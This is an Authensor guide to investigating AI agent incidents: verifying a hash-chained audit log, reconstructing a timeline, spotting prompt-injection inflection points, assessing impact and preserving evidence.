← Back to Learn
audit-trailbest-practicesmonitoring

Post-incident forensics for AI agents

Authensor

After an AI agent incident, you need to reconstruct exactly what happened: what the agent did, in what order, what triggered the behavior change, and what impact it had. This is post-incident forensics, and the quality of your investigation depends on the quality of your audit trail.

The receipt chain as evidence

Every action the agent attempted is recorded in the receipt chain. Each receipt includes:

  • Timestamp (when the action was evaluated)
  • Tool name and arguments (what the agent tried to do)
  • Policy decision and reason (what the safety system decided)
  • Content scan results (any threats detected)
  • Principal identity (which user and agent)
  • Hash chain links (proof of integrity)

Step 1: Verify chain integrity

Before trusting the audit data, verify the hash chain:

curl https://control-plane/api/receipts/verify?session_id=sess_abc123

If the chain is intact, the records have not been tampered with since they were created. If there are breaks, identify which receipts were modified and treat the data with appropriate caution.

Step 2: Build the timeline

Export the receipts and build a chronological timeline:

curl https://control-plane/api/receipts?session_id=sess_abc123&format=timeline

Look for the inflection point: the moment the agent's behavior changed. Common inflection patterns:

  • After processing external content: Indicates indirect prompt injection
  • After a specific user message: Indicates direct prompt injection
  • After a tool response: Indicates a compromised tool or poisoned data
  • Gradual drift with no clear trigger: Indicates context accumulation or model-level issue

Step 3: Analyze the trigger

Examine the receipt immediately before the behavior change. If the agent processed external content, scan that content retroactively:

const triggerReceipt = receipts.find(r => r.id === 'rec_inflection_point');
const scan = aegis.scan(triggerReceipt.args.content);
// Check if injection patterns are present that were not caught at runtime

Step 4: Assess impact

From the inflection point forward, catalog every action:

  • What tools were called?
  • What data was accessed?
  • What data was sent to external systems?
  • What changes were made to files, databases, or configurations?
  • Were other agents or systems affected?

Step 5: Identify control failures

For each harmful action after the inflection point, ask:

  • Did the policy engine allow it? If so, the policy has a gap.
  • Did Aegis miss the injection? If so, add new detection patterns.
  • Did Sentinel detect the anomaly? If so, was the alert acted on?
  • Was the kill switch available? If so, why was it not triggered sooner?

Preserving evidence

During an investigation:

  • Lock the receipt chain (prevent accidental deletion)
  • Export receipts to immutable storage
  • Capture Sentinel metric snapshots
  • Save the policy file version that was active during the incident
  • Record the MCP server tool descriptions at the time

This evidence may be needed for regulatory reporting, customer communication, or legal proceedings.

Keep learning

Explore more guides on AI agent safety, prompt injection, and building secure systems.

View All Guides